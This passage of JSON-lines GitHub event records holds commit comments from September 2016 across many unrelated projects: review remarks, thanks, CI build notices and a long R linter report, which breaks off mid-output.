{"id":"4603076829","type":"CommitCommentEvent","actor":{"login":"manuel-uberti"},"repo":{"name":"NicolasPetton/zerodark-theme"},"payload":{"comment":{"id":19131776,"position":null,"line":null,"path":null,"commit_id":"58572d9a93e2e152160195e551bbd25101a3c09b","created_at":"2016-09-22T15:08:48Z","updated_at":"2016-09-22T15:08:48Z","body":"Just a note: it keeps getting better and better. Thank you for this great theme. 👍 "}},"created_at":"2016-09-22T15:08:48Z"}
{"id":"4603077130","type":"CommitCommentEvent","actor":{"login":"wojtekmach"},"repo":{"name":"hexpm/hex"},"payload":{"comment":{"id":19131777,"position":29,"line":199,"path":"lib/hex/remote_converger.ex","commit_id":"89e560ba21a9fa0bc88a36e83fcff305e9a9edfc","created_at":"2016-09-22T15:08:51Z","updated_at":"2016-09-22T15:08:51Z","body":"@ericmj leftover?"}},"created_at":"2016-09-22T15:08:51Z"}
{"id":"4603081343","type":"CommitCommentEvent","actor":{"login":"korobkov"},"repo":{"name":"activescaffold/active_scaffold"},"payload":{"comment":{"id":19131782,"position":5,"line":215,"path":"lib/active_scaffold/helpers/search_column_helpers.rb","commit_id":"e251beb4efd8525bfb868277514d339a2945797d","created_at":"2016-09-22T15:09:18Z","updated_at":"2016-09-22T15:09:18Z","body":"Thank you, Sergio.\r\nI'm sorry for not putting enough attention on it and relying too much on automatic testing.\r\nRubocop proposed several alternative replacements and I was wrong in guessing which one is right :)"}},"created_at":"2016-09-22T15:09:18Z"}
{"id":"4603082291","type":"CommitCommentEvent","actor":{"login":"PatrickTrentin88"},"repo":{"name":"LucaGaspa/mzn2omt"},"payload":{"comment":{"id":19131789,"position":12,"line":305,"path":"src/intervalSetLib/number.cpp","commit_id":"af126261eb0cd7b8918f91bee5852381dcc8cba2","created_at":"2016-09-22T15:09:26Z","updated_at":"2016-09-22T15:09:26Z","body":"also, you might want to look into the _'precision()'_ method for _std::stringstream_ object."}},"created_at":"2016-09-22T15:09:26Z"}
{"id":"4603083041","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19131790,"position":null,"line":null,"path":null,"commit_id":"58079a2bf3bb511ed2b2506b4b6d339f93381d45","created_at":"2016-09-22T15:09:33Z","updated_at":"2016-09-22T15:09:33Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1122](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13966&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 245, ignored: 3 Build time: 00:10:21"}},"created_at":"2016-09-22T15:09:33Z"}
{"id":"4603087040","type":"CommitCommentEvent","actor":{"login":"dasgarner"},"repo":{"name":"maurofmferrao/xibo-cms"},"payload":{"comment":{"id":19131801,"position":179,"line":473,"path":"lib/Widget/ForecastIo.php","commit_id":"ed9dcbe476099c7dc17f117f4bd5707a4537c41a","created_at":"2016-09-22T15:10:11Z","updated_at":"2016-09-22T15:10:11Z","body":"Should we also add windDirection and humidityPercent to the daily array?"}},"created_at":"2016-09-22T15:10:11Z"}
{"id":"4603087665","type":"CommitCommentEvent","actor":{"login":"rcaballero218"},"repo":{"name":"rcaballero218/turtlenotes-project"},"payload":{"comment":{"id":19131804,"position":null,"line":null,"path":null,"commit_id":"9d102145eee8ab44ece7b331f092e9f67cf3aa50","created_at":"2016-09-22T15:10:17Z","updated_at":"2016-09-22T15:10:17Z","body":"hid username/passwords for security purposes"}},"created_at":"2016-09-22T15:10:17Z"}
{"id":"4603088167","type":"CommitCommentEvent","actor":{"login":"sophokles73"},"repo":{"name":"eclipse/californium"},"payload":{"comment":{"id":19131806,"position":33,"line":33,"path":"californium-core/src/main/java/org/eclipse/californium/core/network/InMemoryMessageIdProvider.java","commit_id":"49949b4ae4bfa8d041c405184a75b31ee859d1d9","created_at":"2016-09-22T15:10:22Z","updated_at":"2016-09-22T15:10:22Z","body":"Currently, the default size of Scandium's `InMemoryConnectionStore` is 500000. And you were complaining about 32000 ;-)\r\nWhat do you think would be a reasonable default value? 2^14 (16384)? In the end, however, we are dealing with *logical* connections only (UDP), so in theory we should be easily be able to support several 100000s of connections on one node, shouldn't we? But if we make this configurable through a Config property a user can chose to set this to any value he wants based on the resources available ..."}},"created_at":"2016-09-22T15:10:22Z"}
{"id":"4603088785","type":"CommitCommentEvent","actor":{"login":"LucaGaspa"},"repo":{"name":"LucaGaspa/mzn2omt"},"payload":{"comment":{"id":19131808,"position":12,"line":305,"path":"src/intervalSetLib/number.cpp","commit_id":"af126261eb0cd7b8918f91bee5852381dcc8cba2","created_at":"2016-09-22T15:10:27Z","updated_at":"2016-09-22T15:10:27Z","body":"setExpr:23 and setExpr:24\r\nmaybe I thought wrong. Is there another way to instantiate a DNumber?\r\nI could do something like:\r\n(in setExpr:29)\r\nInterval s = Interval(lb->getValue, ub->getValue);\r\n\r\nand delete useless to_str() intermediate calls"}},"created_at":"2016-09-22T15:10:27Z"}
{"id":"4603089269","type":"CommitCommentEvent","actor":{"login":"jruesga"},"repo":{"name":"jruesga/rview"},"payload":{"comment":{"id":19131810,"position":null,"line":null,"path":null,"commit_id":"359614520fc3a8f9afd0db19146f20dce052b91d","created_at":"2016-09-22T15:10:30Z","updated_at":"2016-09-22T15:10:30Z","body":"Ah yep. I will revert it. Thx"}},"created_at":"2016-09-22T15:10:30Z"}
{"id":"4603093889","type":"CommitCommentEvent","actor":{"login":"trickpattyFH20"},"repo":{"name":"foreverjs/forever"},"payload":{"comment":{"id":19131819,"position":null,"line":null,"path":null,"commit_id":"16c59330b6bd7fe039d63229f77ed87aba8b34ce","created_at":"2016-09-22T15:11:14Z","updated_at":"2016-09-22T15:11:14Z","body":"so, both `uid` and `id` are deprecated? is there any way to manually set an id for the process?"}},"created_at":"2016-09-22T15:11:14Z"}
{"id":"4603099580","type":"CommitCommentEvent","actor":{"login":"dasgarner"},"repo":{"name":"maurofmferrao/xibo-cms"},"payload":{"comment":{"id":19131828,"position":207,"line":551,"path":"lib/Widget/ForecastIo.php","commit_id":"ed9dcbe476099c7dc17f117f4bd5707a4537c41a","created_at":"2016-09-22T15:12:08Z","updated_at":"2016-09-22T15:12:08Z","body":"We should remove the size parameter - the new scaling replaces it"}},"created_at":"2016-09-22T15:12:08Z"}
{"id":"4603101505","type":"CommitCommentEvent","actor":{"login":"tooskagroup"},"repo":{"name":"tooskagroup/telegramDo"},"payload":{"comment":{"id":19131832,"position":2,"line":342,"path":"TMessagesProj/src/main/java/com/panahit/telegramma/LocaleController.java","commit_id":"ccc448c2630432a9f0b60f29d95e8ec02a2f7cef","created_at":"2016-09-22T15:12:26Z","updated_at":"2016-09-22T15:12:26Z","body":"   a"}},"created_at":"2016-09-22T15:12:26Z"}
{"id":"4603107040","type":"CommitCommentEvent","actor":{"login":"dasgarner"},"repo":{"name":"maurofmferrao/xibo-cms"},"payload":{"comment":{"id":19131839,"position":270,"line":633,"path":"lib/Widget/ForecastIo.php","commit_id":"ed9dcbe476099c7dc17f117f4bd5707a4537c41a","created_at":"2016-09-22T15:13:19Z","updated_at":"2016-09-22T15:13:19Z","body":"Do we also need to add `bootstrap.min.js` to the javascript references?"}},"created_at":"2016-09-22T15:13:19Z"}
{"id":"4603107966","type":"CommitCommentEvent","actor":{"login":"bcostlow"},"repo":{"name":"cohpy/challenge-201608-refactor"},"payload":{"comment":{"id":19131841,"position":null,"line":null,"path":null,"commit_id":"8c242cf8dadeb494061419be1adf69d581b3db5f","created_at":"2016-09-22T15:13:27Z","updated_at":"2016-09-22T15:13:27Z","body":"I always steal my best ideas from you Jim.\n\nThe bit of code using eval is actually quite clever. An interesting problem\nmight be, how do you safely (but still simply) have the same functionality?\n\nI am going to try to bang out something for Monday—but don't hold your\nbreath. I have a talk I have to finish as well.\n\nOn Wed, Sep 21, 2016 at 2:42 PM, James Prior <notifications@github.com>\nwrote:\n\n> On Wed, 21 Sep 2016 10:53:09 -0700, bcostlow <notifications@github.com>\n> wrote:\n>\n> > If you show this, mention the dangers of eval on untrusted imports to\n> newbies.\n>\n> Thanks for the reminder.\n>\n> I will warn newbies (and folks who ought to know better)\n> about the dangers of eval() and friends.\n>\n> It's go to know that the code is getting more eyeballs.\n> I look forward to seeing your entry.\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/cohpy/challenge-201608-refactor/commit/8c242cf8dadeb494061419be1adf69d581b3db5f#commitcomment-19118585>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AADbf3i7Sq0Y4a99XAqKiRLDABRNWRxzks5qsXp4gaJpZM4KDF_P>\n> .\n>\n"}},"created_at":"2016-09-22T15:13:27Z"}
{"id":"4603114130","type":"CommitCommentEvent","actor":{"login":"Slumber86"},"repo":{"name":"apache/cordova-android"},"payload":{"comment":{"id":19131849,"position":null,"line":null,"path":null,"commit_id":"dc579417fe32a5ea1cf466d308fc487902b6036b","created_at":"2016-09-22T15:14:25Z","updated_at":"2016-09-22T15:14:25Z","body":"This is **definitely** a breaking change!"}},"created_at":"2016-09-22T15:14:25Z"}
{"id":"4603117142","type":"CommitCommentEvent","actor":{"login":"tegularius"},"repo":{"name":"tegularius/sch_cake"},"payload":{"comment":{"id":19131855,"position":null,"line":null,"path":null,"commit_id":"2f3c308faec499069959b4489e5a724a7d3b82f3","created_at":"2016-09-22T15:14:53Z","updated_at":"2016-09-22T15:14:53Z","body":"I noticed that as well, but we can query the conntrack-table: https://github.com/tegularius/sch_cake/commit/481671cd3eb65b981e0f453b454ec7ab67cf361a"}},"created_at":"2016-09-22T15:14:53Z"}
{"id":"4603117515","type":"CommitCommentEvent","actor":{"login":"MusikAnimal"},"repo":{"name":"MusikAnimal/pageviews"},"payload":{"comment":{"id":19131856,"position":5,"line":134,"path":"messages/ko.json","commit_id":"b95f99cad12d4200421162154fb7f5e040ed564b","created_at":"2016-09-22T15:14:57Z","updated_at":"2016-09-22T15:14:57Z","body":"Thanks for the heads up!"}},"created_at":"2016-09-22T15:14:57Z"}
{"id":"4603134639","type":"CommitCommentEvent","actor":{"login":"yurem"},"repo":{"name":"GluuFederation/oxTrust"},"payload":{"comment":{"id":19131885,"position":null,"line":null,"path":null,"commit_id":"1b7fcc3a8b7ddf038f6303ef074b6c76e36e270e","created_at":"2016-09-22T15:17:33Z","updated_at":"2016-09-22T15:17:33Z","body":"I think we are speaking about: https://github.com/GluuFederation/oxTrust/issues/337\r\nNow admin can specify next attribute metadata validation properties:\r\nMinimum Length\r\nMaximum Length\r\nRegex Pattern\r\n\r\n@shekhar16 fixed this and it will be part of 2.4.5"}},"created_at":"2016-09-22T15:17:33Z"}
{"id":"4603137542","type":"CommitCommentEvent","actor":{"login":"ZogStriP"},"repo":{"name":"discourse/discourse"},"payload":{"comment":{"id":19131894,"position":null,"line":null,"path":null,"commit_id":"7f66cf618c9c97ba1009989e3c708a4511d6d08d","created_at":"2016-09-22T15:17:58Z","updated_at":"2016-09-22T15:17:58Z","body":"👍 "}},"created_at":"2016-09-22T15:17:58Z"}
{"id":"4603138884","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19131898,"position":null,"line":null,"path":null,"commit_id":"981c81a09465b52f62daed8e9179d9ef6bca0e67","created_at":"2016-09-22T15:18:11Z","updated_at":"2016-09-22T15:18:11Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1123](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13975&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-22T15:18:11Z"}
{"id":"4603139815","type":"CommitCommentEvent","actor":{"login":"paytonrules"},"repo":{"name":"hnlee/httpserver"},"payload":{"comment":{"id":19131901,"position":null,"line":null,"path":null,"commit_id":"7ee66a0fe53e10515811c8821601634f98770ca0","created_at":"2016-09-22T15:18:19Z","updated_at":"2016-09-22T15:18:19Z","body":"Why not parse this into a hash? Or something else easier to manipulate and work with than a string?"}},"created_at":"2016-09-22T15:18:19Z"}
{"id":"4603142144","type":"CommitCommentEvent","actor":{"login":"ThomasKaiser"},"repo":{"name":"igorpecovnik/lib"},"payload":{"comment":{"id":19131909,"position":null,"line":null,"path":null,"commit_id":"b81058c0029c98cba88970d4240f725739a98dd7","created_at":"2016-09-22T15:18:41Z","updated_at":"2016-09-22T15:18:41Z","body":"I tried out 648 MHz and ran in NEO not booting with 4.7.2 or 4.7.3 (can't remember). Next try was 480 MHz and that worked. And while I'm pretty sure that 648 MHz should work too and the issue was not related I thought: C'mon, let's stay with the working value for now. Should at least be tested (I wasted a lot of time in April when dealing with megi's patches the first time)"}},"created_at":"2016-09-22T15:18:41Z"}
{"id":"4603147180","type":"CommitCommentEvent","actor":{"login":"paytonrules"},"repo":{"name":"hnlee/httpserver"},"payload":{"comment":{"id":19131919,"position":25,"line":82,"path":"test/httpserver/operator_test.clj","commit_id":"de04f5b60c69965f4f8f3c4e712eaab80c1da318","created_at":"2016-09-22T15:19:28Z","updated_at":"2016-09-22T15:19:28Z","body":"So does this test fail without the (decode-uri call? I don't follow."}},"created_at":"2016-09-22T15:19:28Z"}
{"id":"4603156473","type":"CommitCommentEvent","actor":{"login":"ThomasKaiser"},"repo":{"name":"igorpecovnik/lib"},"payload":{"comment":{"id":19131947,"position":null,"line":null,"path":null,"commit_id":"b81058c0029c98cba88970d4240f725739a98dd7","created_at":"2016-09-22T15:20:53Z","updated_at":"2016-09-22T15:20:53Z","body":"Alright, [there's](https://github.com/megous/linux/blob/00fd21f55dae8d15c4132af1c56d7d1e812576de/arch/arm/boot/dts/sun8i-h3-orangepi-one.dts#L116-L123) the culprit why 648 MHz didn't work. So we either start to patch megi's dvfs operating points now (necessary anyway since with the small H3 boards performance sucks since not all cpufreq operating points are used when throttling occurs) or we maintain kernel specific cpufrequtils settings or... (no idea)"}},"created_at":"2016-09-22T15:20:53Z"}
{"id":"4603157202","type":"CommitCommentEvent","actor":{"login":"paytonrules"},"repo":{"name":"hnlee/httpserver"},"payload":{"comment":{"id":19131949,"position":12,"line":59,"path":"test/httpserver/operator_test.clj","commit_id":"bfca9f00b8a86adc92741e6cb71df0d7e25bd1f6","created_at":"2016-09-22T15:21:00Z","updated_at":"2016-09-22T15:21:00Z","body":"There's a lot of code in decode-uri for these two tests. For instance would this pass without a parseInt? or the 16. Can't say I'm sure from looking at this."}},"created_at":"2016-09-22T15:21:00Z"}
{"id":"4603157769","type":"CommitCommentEvent","actor":{"login":"FrankenMan"},"repo":{"name":"bubbie/bluks-adventure-into-space"},"payload":{"comment":{"id":19131954,"position":98,"line":98,"path":"entities.lua","commit_id":"6c8b0e8f6fb946876fcde4d12157c44edb31cf3e","created_at":"2016-09-22T15:21:05Z","updated_at":"2016-09-22T15:21:05Z","body":"i'd eat that\r\n"}},"created_at":"2016-09-22T15:21:05Z"}
{"id":"4603159705","type":"CommitCommentEvent","actor":{"login":"HaNdTriX"},"repo":{"name":"thangngoc89/react-howler"},"payload":{"comment":{"id":19131959,"position":13,"line":13,"path":"src/utils.js","commit_id":"f7e63827542a36af81d2a572eb17db5d355a99c3","created_at":"2016-09-22T15:21:23Z","updated_at":"2016-09-22T15:21:23Z","body":"Just fixing the callback line would break the code.\r\nThis might work:\r\n\r\n    if (value !== undefined && typeof callback === 'function') {\r\n        callback()\r\n    )"}},"created_at":"2016-09-22T15:21:23Z"}
{"id":"4603166094","type":"CommitCommentEvent","actor":{"login":"PatrickTrentin88"},"repo":{"name":"LucaGaspa/mzn2omt"},"payload":{"comment":{"id":19131971,"position":12,"line":305,"path":"src/intervalSetLib/number.cpp","commit_id":"af126261eb0cd7b8918f91bee5852381dcc8cba2","created_at":"2016-09-22T15:22:21Z","updated_at":"2016-09-22T15:22:21Z","body":"I just pushed a couple of commits with copy constructors for Interval and IntervalSets. DNumber already have a copy constructor, so you don't really need to access its fields to copy its content."}},"created_at":"2016-09-22T15:22:21Z"}
{"id":"4603170519","type":"CommitCommentEvent","actor":{"login":"phongln"},"repo":{"name":"phongln/hoangWebsite"},"payload":{"comment":{"id":19131981,"position":null,"line":null,"path":null,"commit_id":"23998989f090fc42b713936db2637808c0a918d0","created_at":"2016-09-22T15:23:02Z","updated_at":"2016-09-22T15:23:02Z","body":"Please check again, I cannot upload any file\r\nRead this carefully and follow it : http://www.w3schools.com/php/php_file_upload.asp"}},"created_at":"2016-09-22T15:23:02Z"}
{"id":"4603172376","type":"CommitCommentEvent","actor":{"login":"graziul"},"repo":{"name":"akisch/S4"},"payload":{"comment":{"id":19131985,"position":null,"line":null,"path":null,"commit_id":"5b47cf35673d031859e0516c7cf065ae56bb5bf1","created_at":"2016-09-22T15:23:19Z","updated_at":"2016-09-22T15:23:19Z","body":":(\n\nLet me know if anything is broken that I need to fix. As far as you're\nconcerned, I'm still on the clock for any issues.\n\nOn Wed, Sep 21, 2016 at 5:04 PM, akisch <notifications@github.com> wrote:\n\n> Whoops, something weird happened with this commit but hopefully it\n> shouldn't mess things up (apart from the init file...)\n>\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/akisch/S4/commit/5b47cf35673d031859e0516c7cf065ae56bb5bf1#commitcomment-19120715>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AMmealPVpsA3IrGDyc_TJWUBXkXR2kbGks5qsZvxgaJpZM4KDRs0>\n> .\n>\n"}},"created_at":"2016-09-22T15:23:19Z"}
{"id":"4603177982","type":"CommitCommentEvent","actor":{"login":"maurofmferrao"},"repo":{"name":"maurofmferrao/xibo-cms"},"payload":{"comment":{"id":19131999,"position":4,"line":81,"path":"lib/Widget/ForecastIo.php","commit_id":"ed9dcbe476099c7dc17f117f4bd5707a4537c41a","created_at":"2016-09-22T15:24:12Z","updated_at":"2016-09-22T15:24:12Z","body":"Yes they are, so I will remove them in the next commit. Thanks Dan"}},"created_at":"2016-09-22T15:24:12Z"}
{"id":"4603178791","type":"CommitCommentEvent","actor":{"login":"zador-blood-stained"},"repo":{"name":"igorpecovnik/lib"},"payload":{"comment":{"id":19132002,"position":null,"line":null,"path":null,"commit_id":"b81058c0029c98cba88970d4240f725739a98dd7","created_at":"2016-09-22T15:24:19Z","updated_at":"2016-09-22T15:24:19Z","body":"OK. If there are issues, then let's stay with the value that works. I don't want to to touch DTS for H3 yet before new Ehternet and THS drivers are sent for review."}},"created_at":"2016-09-22T15:24:19Z"}
{"id":"4603184453","type":"CommitCommentEvent","actor":{"login":"Fclem"},"repo":{"name":"Fclem/isbio"},"payload":{"comment":{"id":19132008,"position":null,"line":null,"path":null,"commit_id":"26a38ea40805a79863acd37759088cd249b05d24","created_at":"2016-09-22T15:25:11Z","updated_at":"2016-09-22T15:25:11Z","body":"TODO : unify the way compute/storage module are configured and how docker compute module refer to its secret\r\nand also the different conf location\r\ncome up with a coherent strategy about that, where to store files, etc"}},"created_at":"2016-09-22T15:25:11Z"}
{"id":"4603187428","type":"CommitCommentEvent","actor":{"login":"PatrickTrentin88"},"repo":{"name":"LucaGaspa/mzn2omt"},"payload":{"comment":{"id":19132011,"position":12,"line":305,"path":"src/intervalSetLib/number.cpp","commit_id":"af126261eb0cd7b8918f91bee5852381dcc8cba2","created_at":"2016-09-22T15:25:39Z","updated_at":"2016-09-22T15:25:39Z","body":"The change I applied on your previous initialization cose is simply because I was unable, using gdb, to inspect\r\nthe content of intermediate values and to assess what was wrong with floating point storage into DNumbers while\r\ndebugging it. Everything was on stack, but the wrong content was displayed.\r\n\r\nDoes this have anything to do with the new 'mpq_to_str()' method?"}},"created_at":"2016-09-22T15:25:39Z"}
{"id":"4603187433","type":"CommitCommentEvent","actor":{"login":"maurofmferrao"},"repo":{"name":"maurofmferrao/xibo-cms"},"payload":{"comment":{"id":19132012,"position":179,"line":473,"path":"lib/Widget/ForecastIo.php","commit_id":"ed9dcbe476099c7dc17f117f4bd5707a4537c41a","created_at":"2016-09-22T15:25:39Z","updated_at":"2016-09-22T15:25:39Z","body":"That wasn't needed for this new template, but could be used latter on, so I will add those."}},"created_at":"2016-09-22T15:25:39Z"}
{"id":"4603188528","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"thijsjanzen/GUILDS"},"payload":{"comment":{"id":19132013,"position":null,"line":null,"path":null,"commit_id":"6b95966f7b559d84fca638b4c7f31c44d790098e","created_at":"2016-09-22T15:25:46Z","updated_at":"2016-09-22T15:25:46Z","body":"[R/Condition.R:23:16:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/Condition.R#L23) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​  k  <-  lgamma( (theta_x / 2) + (theta_y / 2)) - \n               ^\n```\n[R/Condition.R:23:50:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/Condition.R#L23) *style:* **Trailing whitespace is superfluous.**\n```r\n​  k  <-  lgamma( (theta_x / 2) + (theta_y / 2)) - \n                                                 ^\n```\n[R/Condition.R:25:10:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/Condition.R#L25) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  l  <- ((theta_x / 2) - 1) * log(nx) + ( (theta_y / 2) - 1) * log(ny)\n         ^\n```\n[R/Condition.R:25:41:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/Condition.R#L25) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​  l  <- ((theta_x / 2) - 1) * log(nx) + ( (theta_y / 2) - 1) * log(ny)\n                                        ^\n```\n[R/Condition.R:74:1:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/Condition.R#L74) *style:* **Trailing whitespace is superfluous.**\n```r\n​ \n^\n```\n[R/Condition.R:115:1:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/Condition.R#L115) *style:* **Variable and function names should be all lowercase.**\n```r\n​logLikelihood.Guilds.Conditional <- function(parameters, model,\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:115:1:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/Condition.R#L115) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​logLikelihood.Guilds.Conditional <- function(parameters, model,\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:115:1:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/Condition.R#L115) *style:* **Variable and function names should not be longer than 30 characters.**\n```r\n​logLikelihood.Guilds.Conditional <- function(parameters, model,\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:121:3:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/Condition.R#L121) *warning:* **local variable ‘LL’ assigned but may not be used**\n```r\n​  LL <- -Inf\n  ^~\n```\n[R/Condition.R:139:9:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/Condition.R#L139) *style:* **Variable and function names should be all lowercase.**\n```r\n​  ll <- logLikelihood.Guilds(parameters, model, sadx, sady, verbose)\n        ^~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:139:9:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/Condition.R#L139) *warning:* **no visible global function definition for ‘logLikelihood.Guilds’**\n```r\n​  ll <- logLikelihood.Guilds(parameters, model, sadx, sady, verbose)\n        ^~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:142:23:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/Condition.R#L142) *warning:* **no visible global function definition for ‘calc_conditional’**\n```r\n​  conditional_part <- calc_conditional(parameters, model, Nx, Ny)\n                      ^~~~~~~~~~~~~~~~\n```\n[R/Condition.R:148:1:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/Condition.R#L148) *style:* **Variable and function names should be all lowercase.**\n```r\n​conditional.LogLik <- function(v, model, J, Sx, Sy, Nx, Ny, kda_x, kda_y,\n^~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:168:9:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/Condition.R#L168) *style:* **Variable and function names should be all lowercase.**\n```r\n​  ll <- logLikguilds(theta_x, theta_y, alpha_x, alpha_y, J,\n        ^~~~~~~~~~~~\n```\n[R/Condition.R:172:14:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/Condition.R#L172) *warning:* **no visible global function definition for ‘calc_conditional’**\n```r\n​  cond_ll <- calc_conditional(v, model, Nx, Ny)\n             ^~~~~~~~~~~~~~~~\n```\n[R/Condition.R:177:1:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/Condition.R#L177) *style:* **Variable and function names should be all lowercase.**\n```r\n​maxLikelihood.Guilds.Conditional <- function(init_vals, model,\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:177:1:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/Condition.R#L177) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​maxLikelihood.Guilds.Conditional <- function(init_vals, model,\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:177:1:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/Condition.R#L177) *style:* **Variable and function names should not be longer than 30 characters.**\n```r\n​maxLikelihood.Guilds.Conditional <- function(init_vals, model,\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:181:12:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/Condition.R#L181) *style:* **Variable and function names should be all lowercase.**\n```r\n​  kda_x <- calcKDA(sadx)\n           ^~~~~~~\n```\n[R/Condition.R:181:12:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/Condition.R#L181) *warning:* **no visible global function definition for ‘calcKDA’**\n```r\n​  kda_x <- calcKDA(sadx)\n           ^~~~~~~\n```\n[R/Condition.R:182:12:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/Condition.R#L182) *style:* **Variable and function names should be all lowercase.**\n```r\n​  kda_y <- calcKDA(sady)\n           ^~~~~~~\n```\n[R/Condition.R:182:12:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/Condition.R#L182) *warning:* **no visible global function definition for ‘calcKDA’**\n```r\n​  kda_y <- calcKDA(sady)\n           ^~~~~~~\n```\n[R/Condition.R:203:17:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/Condition.R#L203) *style:* **Variable and function names should be all lowercase.**\n```r\n​    out <- -1 * conditional.LogLik(x, model, J, Sx, Sy, Nx, Ny,\n                ^~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:211:10:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/Condition.R#L211) *warning:* **no visible global function definition for ‘simplex’, Did you mean 'complex'?**\n```r\n​    x <- simplex(init_vals, g, verbose)\n         ^~~~~~~\n```\n[R/Condition.R:214:10:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/Condition.R#L214) *warning:* **no visible global function definition for ‘subplex’**\n```r\n​    x <- subplex(init_vals, g)\n         ^~~~~~~\n```\n[R/drawLocal.R:2:15:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L2) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​  k1 <- unique( round(10 ^ seq(0, log10(j - 1) , len = 1000)))\n              ^\n```\n[R/drawLocal.R:2:48:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L2) *style:* **Commas should never have a space before.**\n```r\n​  k1 <- unique( round(10 ^ seq(0, log10(j - 1) , len = 1000)))\n                                              ~^\n```\n[R/drawLocal.R:3:1:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L3) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tidx0 <- which( x == 0 )\n^\n```\n[R/drawLocal.R:4:1:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L4) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tif(length(idx0) > 0) {\n^\n```\n[R/drawLocal.R:5:1:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L5) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\taux <- log(th) + lgamma(I) - lgamma(I+j) 